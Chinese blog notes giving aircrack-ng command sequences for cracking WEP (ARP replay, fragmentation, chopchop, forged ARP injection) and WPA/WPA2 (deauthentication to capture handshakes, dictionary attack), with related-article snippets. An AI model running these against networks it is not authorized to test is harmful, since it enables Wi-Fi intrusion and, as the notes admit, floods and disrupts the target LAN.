aircrack ng 系列工具使用筆記

2021-06-16 08:16:33 字數 2461 閱讀 7008

初始化工作

airmon-ng start wlan0 9

開啟乙個網絡卡監聽裝置,並設定到channel 9; channel可用iwconfig修改

airodump-ng mon0

無引數啟動airodump-ng可檢視所有接收範圍內的ap、client資訊

aireplay-ng -9 -e (bssid) -a (ap mac) ath0

測試注入攻擊鏈路質量

airodump-ng -c (channel) --bssid (ap mac) -w output ath0

監聽ap在頻道的所有資料報並儲存到output檔案,此步應在以下步驟提到airodump的時候執行

wep:

aireplay-ng -1 0 -e (bssid) -a (ap mac) -h (host mac) ath0

偽認證聯機請求

aireplay-ng -1 6000 -o 1 -q 10 -e (bssid) -a (ap mac) -h (host mac) ath0

airodump-ng -c (channel) --bssid (ap mac) -w output ath0

監聽收集

aireplay-ng -3 -b (ap mac) -h (host mac) ath0

監聽arp報文,一旦出現就不斷將該報文重發,使目標機器產生實際回應資料,發回更多iv資料。

此時若有「內奸」,即有可控制的已經連線在目標網段的機器,ping乙個網段內不存在的ip即可產生這樣乙個arp報文,接下來可以執行aircrack破解了。注意這個步驟可能會對目標區域網產生類似arp洪水攻擊一樣的效果,網內資料延時丟包都很嚴重。

對於無機器連線的wep:

aireplay-ng -5 -b (ap mac) -h (host mac) ath0

fragmenation攻擊,監聽乙個ap廣播出來的資料報,並抽離有效的偽隨機資料(prga),儲存到fragment-***x-***xx.xor檔案供下一步使用.

有時監聽到的不是廣播包,**攻擊後ap沒有回應,一系列重試後程式會重新監聽; 有時候可能需要不少時間,加-f引數可以自動應答。

aireplay-ng -4 -h 00:09:5b:ec:ee:f2 -b 00:14:6c:7e:40:80 ath0

chopchop攻擊,上述攻擊不奏效可試,相同作用

packetforge-ng -0 -a (ap mac) -h (host mac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

根據fragment-0203-180343.xor檔案的prga,產生arp請求包,儲存到arp-request檔案

使用-k 192.168.1.1 -l 10.255.255.255可使ap產生兩倍的有效iv,192.168.1.1為確實存在的ip,通常的閘道器

使用-k 192.168.1.89 -l 10.255.255.255可使ap產生三倍的有效iv,192.168.1.89為確實存在的客戶端ip

airodump-ng -c (channel) --bssid (ap mac) -w output ath0

監聽收集

aireplay-ng -2 -r arp-request ath0

不斷注入上述產生的arp-request報文

這一步也會使目標網路接近癱瘓,極大延時,丟包。

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (ap map) -h (host mac) ath0

上述產生、傳送arp-request的步驟可由這一步替換,這是**任何乙個收到的有效資料報,方便,缺點是若資料報較大,**過程較慢。還可使用-r capture-01.cap讀取以前讀取的有效資料進行**注入。

aircrack-ng -b (ap mac) capture*.cap

解密aircrack-ng -b (ap mac) capture*.cap

另一種解密演算法

wpa/wpa2:

airodump-ng -c (channel) --bssid (ap mac) -w output ath0

監聽捕捉另外一客戶端與ap之間的連線,上方出現wpa handshake: xx:xx...為成功

aireplay-ng -0 1 -a (ap mac) -c (the mac of a connected client) ath0

往已經連線到ap的乙個客戶端偽造乙個離線包,使其離線重連以便捕捉handshake.

注意要收到ack,才表明被攻擊客戶端收到,才會下線;傳送離線不宜過密過多。

aircrack-ng -w password.lst -b 00:14:6c:7e:40:80 output*.cap

暴力破解。password.lst為密碼字典,破解的成功率取決於字典的覆蓋程度以及機器的速度。

aircrack ng工具學習記錄(一)

service network manager stopairmon ng check kill killiwconfigairmon ng start 顯示出新的介面名在 monitor mode enabled on 介面名 airodump ng 介面名 找出某一無線網路的資訊 一行 bssi...

無線密碼破解工具 Aircrack ng

版本說明 aircrack ng1.6 使用環境 linux windows kali自帶 工具說明 aircrack ng 是一款無線密碼破解工具 aircrack ng是乙個與802.11標準的無線網路分析有關的安全軟體,主要功能有 網路偵測,資料報嗅探,wep和wpa wpa2 psk破解。a...

無線安全審計工具aircrack ng詳解

無線滲透試的工具有很多,在windows下和linux下的工具各有千秋,因在windows下的工具基本都是圖形介面,操作起來比較直觀易懂,在此就不再做過多介紹,本方重點介紹在linux下的一種通用的方法。首先講一下現行無線滲透試的一般方法和原理。目前無線滲透試的兩種方法 1 抓握手包,跑包。2 通過...